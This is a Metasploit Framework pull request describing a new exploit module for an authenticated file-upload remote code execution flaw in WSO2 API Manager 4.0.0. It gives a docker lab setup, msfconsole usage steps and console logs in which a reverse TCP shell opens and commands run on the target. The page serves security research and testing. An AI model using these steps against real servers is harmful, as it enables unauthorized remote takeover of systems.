search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.23k stars 14k forks source link

Added module for WSO2 API Manager Documentation File Upload Remote Co… #19647

Open heyder opened 1 week ago

heyder commented 1 week ago

Vulnerable Application

Closes #19646

A vulnerability in the 'Add API Documentation' feature allows malicious users with specific permissions (/permission/admin/login and /permission/admin/manage/api/publish) to upload arbitrary files to a user-controlled server location. This flaw could be exploited to execute remote code, enabling an attacker to gain control over the server.

services:
  api-manager:
    image: wso2/wso2am:4.0.0-alpine
    container_name: swo2_api_manager
    ports:
      - "9443:9443"

docker-compose up

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use multi/http/wso2_api_manager_file_upload_rce
  4. Do: set rhosts [ip]
  5. Do: set lhost [ip]
  6. Do: run
  7. You should get a shell.

Scenarios

WSO2 API Manager 4.0.0

msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target...
[+] Authentication successful
[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable.
[+] Authentication successful
[*] Listing APIs...
[+] Document created successfully
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... 
[+] Payload executed successfully
[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:58206) at 2024-11-03 15:36:37 +0100

id
uid=802(wso2carbon) gid=802(wso2) groups=802(wso2)
pwd
/home/wso2carbon/wso2am-4.0.0
exit
[*] 127.0.0.1 - Command shell session 2 closed.

Manually setting up the wrong API version

msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > exploit 

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target...
[+] Authentication successful
[-] Mismatch between version found (4.0.0) and module target version (WSO2 API Manager (4.2.0))
[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable.
[*] Listing products APIs...
[-] Exploit aborted due to failure: unexpected-reply: Failed to list APIs
[*] Exploit completed, but no session was created.